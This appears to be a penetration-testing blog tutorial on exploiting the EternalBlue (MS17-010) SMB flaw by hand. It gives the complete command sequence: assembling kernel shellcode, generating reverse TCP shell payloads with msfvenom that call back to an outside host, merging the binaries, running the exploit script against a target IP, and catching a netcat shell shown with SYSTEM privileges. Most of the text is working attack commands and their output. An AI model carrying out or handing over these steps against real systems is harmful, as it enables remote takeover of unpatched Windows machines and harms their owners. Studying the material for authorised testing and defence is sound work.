In this post we’ll see how EternalBlue (MS17-010) can be exploited manually by compiling the payload from source and running it against a vulnerable target. This is useful in situations where Metasploit is not available or not an option, like running quick demos or exploiting from C2 hosts. Unlike “zzz_exploit” this method does not require access to a named pipe, nor does it require any credentials. However, the downside to this is an increased risk of crashing the target so please use with caution. Big thanks Worawit Wang for developing the shellcodes and making them public.
Obtaining the shellcodes
Clone the following repo to obtain the kernel shellcodes
git clone https://github.com/worawit/MS17-010.git
Our point of interest are the shellcodes (
.asm) located in MS17-010/shellcode which we must compile in order to make them executable.
$ ls MS17-010/shellcode | grep shellcode eternalblue_kshellcode_x64.asm eternalblue_kshellcode_x86.asm
As you can see there are two
.asm files in this folder; one for x64 and one for x86. Which one you choose is dependent on the architecture of your target. If you are unsure or if you just want a payload that works on both architectures then i suggest compiling shellcodes for both architectures and later merge them as explained in the optional section below.
Compiling the shellcode(s)
Run the appropriate command to assemble shellcodes with
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
Doing so will output the binary for your chosen arch which contains everything needed to exploit the infamous vulnerability - which is great, however, not very useful unless it also contains some evil code which is to be executed once the vulnerability itself has been exploited. This “evil code” can be any binary that you desire, provided it’s compiled for the correct architecture as well.
To accomplish that we must combine both the kernel exploit and the payload into a single binary. For the sake of this example I’ll use
msfvenom to generate a simple reverse tcp shell payload.
$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=elliot.sh --platform windows -a x64 --format raw -o sc_x64_payload.bin No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Saved as: sc_x64_payload.bin
$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=elliot.sh --platform windows -a x86 --format raw -o sc_x86_payload.bin No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Saved as: sc_x86_payload.bin
By now you should have at least one
*_kernel.bin and one
*_payload_bin sitting in your directory.
cat to merge them as one.
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
x64 and x86 in one binary (optional)
Provided you have compiled binaries for both architectures (and want them both in your payload) then merge them together with the included
eternalblue_sc_merge.py script located in the
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
Exploiting the target
By now you should have one binary containing both the kernel exploit and your evil payload.
To run the exploit, you must use one of the provided
eternalblue_exploit scripts located in the
$ ls MS17-010 | grep eternalblue_exploit eternalblue_exploit7.py eternalblue_exploit8.py
To decide which script to use you must first consider the target OS. If you don’t know then you better be a working professional sitting a test environment running these blindly target is a bad idea. If anything, expect your target to crash or force reboot once the session is closed.
- Windows Server 2012 (x64)
- Windows 8.1 & RT
- Windows 10 (x64) (build < 14393)
- Windows Server 2008 & R2
- Windows Server 2012 & R2 (x86)
- Windows Server 2016 (x64)
- Windows Vista
- Windows 7
python MS17-010/eternalblue_exploit7.py <target_IP> final.bin
Example running against vulnerable Windows 7 host:
$ python MS17-010/eternalblue_exploit7.py 126.96.36.199 sc_all.bin
$ nc -lvnp 443 listening on [any] 443 ... connect to [188.8.131.52] from (UNKNOWN) [184.108.40.206] 49191 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system